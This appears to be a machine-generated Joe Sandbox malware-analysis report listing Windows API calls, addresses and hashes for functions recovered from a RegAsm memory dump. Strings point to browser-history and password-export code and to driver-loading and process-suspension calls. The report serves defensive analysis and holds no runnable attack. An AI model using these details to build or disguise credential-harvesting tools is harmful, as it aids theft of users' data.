                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1043902810-0
                                                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                        • memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                        • memcpy.MSVCRT ref: 0040E3EC
                                                                        • memcpy.MSVCRT ref: 0040E407
                                                                        • memcpy.MSVCRT ref: 0040E422
                                                                        • memcpy.MSVCRT ref: 0040E43D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                        • API String ID: 3073804840-2252543386
                                                                        • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                        • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                        • API String ID: 2899246560-1542517562
                                                                        • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                        • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                        • String ID:
                                                                        • API String ID: 3715365532-3916222277
                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        • memset.MSVCRT ref: 004085CF
                                                                        • memset.MSVCRT ref: 004085F1
                                                                        • memset.MSVCRT ref: 00408606
                                                                        • strcmp.MSVCRT ref: 00408645
                                                                        • _mbscpy.MSVCRT ref: 004086DB
                                                                        • _mbscpy.MSVCRT ref: 004086FA
                                                                        • memset.MSVCRT ref: 0040870E
                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                        • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID: ---
                                                                        • API String ID: 3437578500-2854292027
                                                                        • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                        • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041087D
                                                                        • memset.MSVCRT ref: 00410892
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1010922700-0
                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                        APIs
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                        • malloc.MSVCRT ref: 004186B7
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                        • malloc.MSVCRT ref: 004186FE
                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$FullNamePath$malloc$Version
                                                                        • String ID: |A
                                                                        • API String ID: 4233704886-1717621600
                                                                        • Opcode ID: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                        • Opcode Fuzzy Hash: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                        • API String ID: 2081463915-1959339147
                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                        • memcpy.MSVCRT ref: 0041234D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1700100422-0
                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                        • String ID:
                                                                        • API String ID: 552707033-0
                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: %%0.%df
                                                                        • API String ID: 3473751417-763548558
                                                                        • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                        • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                        • GetParent.USER32(?), ref: 00406136
                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                        • String ID: A
                                                                        • API String ID: 2892645895-3554254475
                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                        APIs
                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                        • memset.MSVCRT ref: 0040DA23
                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                        • String ID: caption
                                                                        • API String ID: 973020956-4135340389
                                                                        • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                        • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                        APIs
                                                                        Strings
                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                        • API String ID: 1283228442-2366825230
                                                                        • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                        • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00413972
                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                        • memset.MSVCRT ref: 004139B8
                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                        • memset.MSVCRT ref: 00413A00
                                                                        • memcpy.MSVCRT ref: 00413A1B
                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                        • String ID: \systemroot
                                                                        • API String ID: 4173585201-1821301763
                                                                        • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                        • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                        • API String ID: 4139908857-2887671607
                                                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                        APIs
                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                        • memcpy.MSVCRT ref: 0040C11B
                                                                        • strchr.MSVCRT ref: 0040C140
                                                                        • strchr.MSVCRT ref: 0040C151
                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                        • memset.MSVCRT ref: 0040C17A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                        • String ID: 4$h
                                                                        • API String ID: 4019544885-1856150674
                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 4066108131-3849865405
                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004082EF
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                        • memset.MSVCRT ref: 00408362
